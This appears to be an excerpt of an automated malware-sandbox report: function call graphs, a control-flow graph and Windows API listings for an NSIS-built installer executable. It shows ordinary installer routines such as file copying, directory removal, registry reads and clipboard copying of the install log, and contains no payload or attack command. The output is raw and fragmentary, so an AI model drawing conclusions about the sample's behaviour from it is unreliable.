3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3965 406009 lstrcpynW 3820->3965 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3915 40160c 3834->3915 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3915 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3942 40145c 3842->3942 3859 40145c 18 API calls 3843->3859 3957 401446 3844->3957 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3915 3847->3915 3964 405f51 wsprintfW 3847->3964 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3915 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3915 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3915 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3915 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3915 3879 4062a3 11 API calls 3868->3879 3869->3915 3870->3915 3871->3915 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3960 4062d5 FindFirstFileW 3874->3960 3885 40197f 3875->3885 3928 4019a1 3875->3928 3877 40169a 3887 4062a3 11 API calls 3877->3887 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3910 4062d5 2 API calls 3885->3910 3885->3928 3895 4016a7 3887->3895 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3915 3908 404f72 25 API calls 3892->3908 3904 4016b1 Sleep 3895->3904 3905 4016ae 3895->3905 3896 4019b8 GetShortPathNameW 3896->3915 3906 4018f5 3897->3906 3898->3915 3899->3915 3907 4062a3 11 API calls 3900->3907 3901 4018c2 3911 4062a3 11 API calls 3901->3911 3902 4018a9 3909 4062a3 11 API calls 3902->3909 3904->3915 3905->3904 3913 4062a3 11 API calls 3906->3913 3907->3915 3908->3915 3909->3915 3914 401991 3910->3914 3911->3915 3912 4017d4 3916 401864 3912->3916 3919 405d06 CharNextW 3912->3919 3937 4062a3 11 API calls 3912->3937 3917 401902 MoveFileW 3913->3917 3914->3928 3963 406009 lstrcpynW 3914->3963 3915->3832 3916->3892 3918 40186e 3916->3918 3920 401912 3917->3920 3921 40191e 3917->3921 3922 404f72 25 API calls 3918->3922 3924 4017e6 CreateDirectoryW 3919->3924 3920->3892 3926 401942 3921->3926 3931 4062d5 2 API calls 3921->3931 3927 401875 3922->3927 3924->3912 3925 4017fe GetLastError 3924->3925 3929 401827 GetFileAttributesW 3925->3929 3930 40180b GetLastError 3925->3930 3936 4062a3 11 API calls 3926->3936 3956 406009 lstrcpynW 3927->3956 3928->3896 3928->3915 3929->3912 3933 4062a3 11 API calls 3930->3933 3934 401929 3931->3934 3933->3912 3934->3926 3939 406c68 42 API calls 3934->3939 3935 401882 SetCurrentDirectoryW 3935->3915 3938 40195c 3936->3938 3937->3912 3938->3915 3940 401936 3939->3940 3941 404f72 25 API calls 3940->3941 3941->3926 3943 406805 18 API calls 3942->3943 3944 401488 3943->3944 3945 401497 3944->3945 3946 406038 5 API calls 3944->3946 3947 4062a3 lstrlenW wvsprintfW 3945->3947 3946->3945 3948 4060e7 9 API calls 3947->3948 3949 4017c9 3948->3949 3950 405d59 CharNextW CharNextW 3949->3950 3951 405d76 3950->3951 3954 405d88 3950->3954 3953 405d83 CharNextW 3951->3953 3951->3954 3952 405dac 3952->3912 3953->3952 3954->3952 3955 405d06 CharNextW 3954->3955 3955->3954 3956->3935 3958 406805 18 API calls 3957->3958 3959 401455 3958->3959 3959->3877 3961 4018a5 3960->3961 3962 4062eb FindClose 3960->3962 3961->3901 3961->3902 3962->3961 3963->3928 3964->3915 3965->3822 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3653 4024->3677 4025->3696 4026->3696 4027->3685 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3706 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4941 402a84 4942 401553 19 API calls 4941->4942 4943 402a8e 4942->4943 4944 401446 18 API calls 4943->4944 4945 402a98 4944->4945 4946 401a13 4945->4946 4947 402ab2 RegEnumKeyW 4945->4947 4948 402abe RegEnumValueW 4945->4948 4949 402a7e 4947->4949 4948->4946 4948->4949 4949->4946 4950 4029e4 RegCloseKey 4949->4950 4950->4946 4951 402c8a 4952 402ca2 4951->4952 4953 402c8f 4951->4953 4955 40145c 18 API calls 4952->4955 4954 401446 18 API calls 4953->4954 4957 402c97 4954->4957 4956 402ca9 lstrlenW 4955->4956 4956->4957 4958 402ccb WriteFile 4957->4958 4959 401a13 4957->4959 4958->4959 4960 40400d 4961 40406a 4960->4961 4962 40401a lstrcpynA lstrlenA 4960->4962 4962->4961 4963 40404b 4962->4963 4963->4961 4964 404057 GlobalFree 4963->4964 4964->4961 4965 401d8e 4966 40145c 18 API calls 4965->4966 4967 401d95 ExpandEnvironmentStringsW 4966->4967 4968 401da8 4967->4968 4970 401db9 4967->4970 4969 401dad lstrcmpW 4968->4969 4968->4970 4969->4970 4971 401e0f 4972 401446 18 API calls 4971->4972 4973 401e17 4972->4973 4974 401446 18 API calls 4973->4974 4975 401e21 4974->4975 4976 4030e3 4975->4976 4978 405f51 wsprintfW 4975->4978 4978->4976 4979 402392 4980 40145c 18 API calls 4979->4980 4981 402399 4980->4981 4984 4071f8 4981->4984 4985 406ed2 25 API calls 4984->4985 4986 407218 4985->4986 4987 407222 lstrcpynW lstrcmpW 4986->4987 4988 4023a7 4986->4988 4989 407254 4987->4989 4990 40725a lstrcpynW 4987->4990 4989->4990 4990->4988 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4991 402797 4992 40145c 18 API calls 4991->4992 4993 4027ae 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027b7 4994->4995 4996 40145c 18 API calls 4995->4996 4997 4027c0 GetPrivateProfileStringW lstrcmpW 4996->4997 4998 402e18 4999 40145c 18 API calls 4998->4999 5000 402e1f FindFirstFileW 4999->5000 5001 402e32 5000->5001 5006 405f51 wsprintfW 5001->5006 5003 402e43 5007 406009 lstrcpynW 5003->5007 5005 402e50 5006->5003 5007->5005 5008 401e9a 5009 40145c 18 API calls 5008->5009 5010 401ea1 5009->5010 5011 401446 18 API calls 5010->5011 5012 401eab wsprintfW 5011->5012 4288 401a1f 4289 40145c 18 API calls 4288->4289 4290 401a26 4289->4290 4291 4062a3 11 API calls 4290->4291 4292 401a49 4291->4292 4293 401a64 4292->4293 4294 401a5c 4292->4294 4342 406009 lstrcpynW 4293->4342 4341 406009 lstrcpynW 4294->4341 4297 401a62 4301 406038 5 API calls 4297->4301 4298 401a6f 4299 406722 3 API calls 4298->4299 4300 401a75 lstrcatW 4299->4300 4300->4297 4303 401a81 4301->4303 4302 4062d5 2 API calls 4302->4303 4303->4302 4304 405e30 2 API calls 4303->4304 4306 401a98 CompareFileTime 4303->4306 4307 401ba9 4303->4307 4311 4062a3 11 API calls 4303->4311 4315 406009 lstrcpynW 4303->4315 4321 406805 18 API calls 4303->4321 4328 405ca0 MessageBoxIndirectW 4303->4328 4332 401b50 4303->4332 4339 401b5d 4303->4339 4340 405e50 GetFileAttributesW CreateFileW 4303->4340 4304->4303 4306->4303 4308 404f72 25 API calls 4307->4308 4310 401bb3 4308->4310 4309 404f72 25 API calls 4312 401b70 4309->4312 4313 40337f 37 API calls 4310->4313 4311->4303 4316 4062a3 11 API calls 4312->4316 4314 401bc6 4313->4314 4317 4062a3 11 API calls 4314->4317 4315->4303 4323 401b8b 4316->4323 4318 401bda 4317->4318 4319 401be9 SetFileTime 4318->4319 4320 401bf8 CloseHandle 4318->4320 4319->4320 4322 401c09 4320->4322 4320->4323 4321->4303 4324 401c21 4322->4324 4325 401c0e 4322->4325 4327 406805 18 API calls 4324->4327 4326 406805 18 API calls 4325->4326 4329 401c16 lstrcatW 4326->4329 4330 401c29 4327->4330 4328->4303 4329->4330 4331 4062a3 11 API calls 4330->4331 4333 401c34 4331->4333 4334 401b93 4332->4334 4335 401b53 4332->4335 4336 405ca0 MessageBoxIndirectW 4333->4336 4337 4062a3 11 API calls 4334->4337 4338 4062a3 11 API calls 4335->4338 4336->4323 4337->4323 4338->4339 4339->4309 4340->4303 4341->4297 4342->4298 5013 40209f GetDlgItem GetClientRect 5014 40145c 18 API calls 5013->5014 5015 4020cf LoadImageW SendMessageW 5014->5015 5016 4030e3 5015->5016 5017 4020ed DeleteObject 5015->5017 5017->5016 5018 402b9f 5019 401446 18 API calls 5018->5019 5024 402ba7 5019->5024 5020 402c4a 5021 402bdf ReadFile 5023 402c3d 5021->5023 5021->5024 5022 401446 18 API calls 5022->5023 5023->5020 5023->5022 5030 402d17 ReadFile 5023->5030 5024->5020 5024->5021 5024->5023 5025 402c06 MultiByteToWideChar 5024->5025 5026 402c3f 5024->5026 5028 402c4f 5024->5028 5025->5024 5025->5028 5031 405f51 wsprintfW 5026->5031 5028->5023 5029 402c6b SetFilePointer 5028->5029 5029->5023 5030->5023 5031->5020 5032 402b23 GlobalAlloc 5033 402b39 5032->5033 5034 402b4b 5032->5034 5035 401446 18 API calls 5033->5035 5036 40145c 18 API calls 5034->5036 5037 402b41 5035->5037 5038 402b52 WideCharToMultiByte lstrlenA 5036->5038 5039 402b93 5037->5039 5040 402b84 WriteFile 5037->5040 5038->5037 5040->5039 5041 402384 GlobalFree 5040->5041 5041->5039 5043 4044a5 5044 404512 5043->5044 5045 4044df 5043->5045 5047 40451f GetDlgItem GetAsyncKeyState 5044->5047 5054 4045b1 5044->5054 5111 405c84 GetDlgItemTextW 5045->5111 5050 40453e GetDlgItem 5047->5050 5057 40455c 5047->5057 5048 4044ea 5051 406038 5 API calls 5048->5051 5049 40469d 5109 404833 5049->5109 5113 405c84 GetDlgItemTextW 5049->5113 5052 403d3f 19 API calls 5050->5052 5053 4044f0 5051->5053 5056 404551 ShowWindow 5052->5056 5059 403e74 5 API calls 5053->5059 5054->5049 5060 406805 18 API calls 5054->5060 5054->5109 5056->5057 5062 404579 SetWindowTextW 5057->5062 5067 405d59 4 API calls 5057->5067 5058 403dca 8 API calls 5063 404847 5058->5063 5064 4044f5 GetDlgItem 5059->5064 5065 40462f SHBrowseForFolderW 5060->5065 5061 4046c9 5066 40677e 18 API calls 5061->5066 5068 403d3f 19 API calls 5062->5068 5069 404503 IsDlgButtonChecked 5064->5069 5064->5109 5065->5049 5070 404647 CoTaskMemFree 5065->5070 5071 4046cf 5066->5071 5072 40456f 5067->5072 5073 404597 5068->5073 5069->5044 5074 406722 3 API calls 5070->5074 5114 406009 lstrcpynW 5071->5114 5072->5062 5078 406722 3 API calls 5072->5078 5075 403d3f 19 API calls 5073->5075 5076 404654 5074->5076 5079 4045a2 5075->5079 5080 40468b SetDlgItemTextW 5076->5080 5085 406805 18 API calls 5076->5085 5078->5062 5112 403d98 SendMessageW 5079->5112 5080->5049 5081 4046e6 5083 4062fc 3 API calls 5081->5083 5092 4046ee 5083->5092 5084 4045aa 5088 4062fc 3 API calls 5084->5088 5086 404673 lstrcmpiW 5085->5086 5086->5080 5089 404684 lstrcatW 5086->5089 5087 404730 5115 406009 lstrcpynW 5087->5115 5088->5054 5089->5080 5091 404739 5093 405d59 4 API calls 5091->5093 5092->5087 5097 406751 2 API calls 5092->5097 5098 404785 5092->5098 5094 40473f GetDiskFreeSpaceW 5093->5094 5096 404763 MulDiv 5094->5096 5094->5098 5096->5098 5097->5092 5100 4047e2 5098->5100 5101 4043ad 21 API calls 5098->5101 5099 404805 5116 403d85 KiUserCallbackDispatcher 5099->5116 5100->5099 5102 40141d 80 API calls 5100->5102 5103 4047d3 5101->5103 5102->5099 5105 4047e4 SetDlgItemTextW 5103->5105 5106 4047d8 5103->5106 5105->5100 5107 4043ad 21 API calls 5106->5107 5107->5100 5108 404821 5108->5109 5117 403d61 5108->5117 5109->5058 5111->5048 5112->5084 5113->5061 5114->5081 5115->5091 5116->5108 5118 403d74 SendMessageW 5117->5118 5119 403d6f 5117->5119 5118->5109 5119->5118 5120 402da5 5121 4030e3 5120->5121 5122 402dac 5120->5122 5123 401446 18 API calls 5122->5123 5124 402db8 5123->5124 5125 402dbf SetFilePointer 5124->5125 5125->5121 5126 402dcf 5125->5126 5126->5121 5128 405f51 wsprintfW 5126->5128 5128->5121 5129 4030a9 SendMessageW 5130 4030c2 InvalidateRect 5129->5130 5131 4030e3 5129->5131 5130->5131 5132 401cb2 5133 40145c 18 API calls 5132->5133 5134 401c54 5133->5134 5135 4062a3 11 API calls 5134->5135 5138 401c64 5134->5138 5136 401c59 5135->5136 5137 406c9b 81 API calls 5136->5137 5137->5138 4088 4021b5 4089 40145c 18 API calls 4088->4089 4090 4021bb 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021c4 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021cd 4093->4094 4095 40145c 18 API calls 4094->4095 4096 4021d6 4095->4096 4097 404f72 25 API calls 4096->4097 4098 4021e2 ShellExecuteW 4097->4098 4099 40221b 4098->4099 4100 40220d 4098->4100 4102 4062a3 11 API calls 4099->4102 4101 4062a3 11 API calls 4100->4101 4101->4099 4103 402230 4102->4103 5146 402238 5147 40145c 18 API calls 5146->5147 5148 40223e 5147->5148 5149 4062a3 11 API calls 5148->5149 5150 40224b 5149->5150 5151 404f72 25 API calls 5150->5151 5152 402255 5151->5152 5153 405c3f 2 API calls 5152->5153 5154 40225b 5153->5154 5155 4062a3 11 API calls 5154->5155 5158 4022ac CloseHandle 5154->5158 5161 40226d 5155->5161 5157 4030e3 5158->5157 5159 402283 WaitForSingleObject 5160 402291 GetExitCodeProcess 5159->5160 5159->5161 5160->5158 5163 4022a3 5160->5163 5161->5158 5161->5159 5162 406332 2 API calls 5161->5162 5162->5159 5165 405f51 wsprintfW 5163->5165 5165->5158 5166 4040b8 5167 4040d3 5166->5167 5175 404201 5166->5175 5171 40410e 5167->5171 5197 403fca WideCharToMultiByte 5167->5197 5168 40426c 5169 404276 GetDlgItem 5168->5169 5170 40433e 5168->5170 5172 404290 5169->5172 5173 4042ff 5169->5173 5176 403dca 8 API calls 5170->5176 5178 403d3f 19 API calls 5171->5178 5172->5173 5181 4042b6 6 API calls 5172->5181 5173->5170 5182 404311 5173->5182 5175->5168 5175->5170 5177 40423b GetDlgItem SendMessageW 5175->5177 5180 404339 5176->5180 5202 403d85 KiUserCallbackDispatcher 5177->5202 5179 40414e 5178->5179 5184 403d3f 19 API calls 5179->5184 5181->5173 5185 404327 5182->5185 5186 404317 SendMessageW 5182->5186 5189 40415b CheckDlgButton 5184->5189 5185->5180 5190 40432d SendMessageW 5185->5190 5186->5185 5187 404267 5188 403d61 SendMessageW 5187->5188 5188->5168 5200 403d85 KiUserCallbackDispatcher 5189->5200 5190->5180 5192 404179 GetDlgItem 5201 403d98 SendMessageW 5192->5201 5194 40418f SendMessageW 5195 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5194->5195 5196 4041ac GetSysColor 5194->5196 5195->5180 5196->5195 5198 404007 5197->5198 5199 403fe9 GlobalAlloc WideCharToMultiByte 5197->5199 5198->5171 5199->5198 5200->5192 5201->5194 5202->5187 4197 401eb9 4198 401f24 4197->4198 4199 401ec6 4197->4199 4200 401f53 GlobalAlloc 4198->4200 4201 401f28 4198->4201 4202 401ed5 4199->4202 4209 401ef7 4199->4209 4203 406805 18 API calls 4200->4203 4208 4062a3 11 API calls 4201->4208 4213 401f36 4201->4213 4204 4062a3 11 API calls 4202->4204 4207 401f46 4203->4207 4205 401ee2 4204->4205 4210 402708 4205->4210 4215 406805 18 API calls 4205->4215 4207->4210 4211 402387 GlobalFree 4207->4211 4208->4213 4219 406009 lstrcpynW 4209->4219 4211->4210 4221 406009 lstrcpynW 4213->4221 4214 401f06 4220 406009 lstrcpynW 4214->4220 4215->4205 4217 401f15 4222 406009 lstrcpynW 4217->4222 4219->4214 4220->4217 4221->4207 4222->4210 5203 4074bb 5205 407344 5203->5205 5204 407c6d 5205->5204 5206 4073c2 GlobalFree 5205->5206 5207 4073cb GlobalAlloc 5205->5207 5208 407443 GlobalAlloc 5205->5208 5209 40743a GlobalFree 5205->5209 5206->5207 5207->5204 5207->5205 5208->5204 5208->5205 5209->5208

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                  • EmptyClipboard.USER32 ref: 00405411
                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                  • CloseClipboard.USER32 ref: 0040546E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
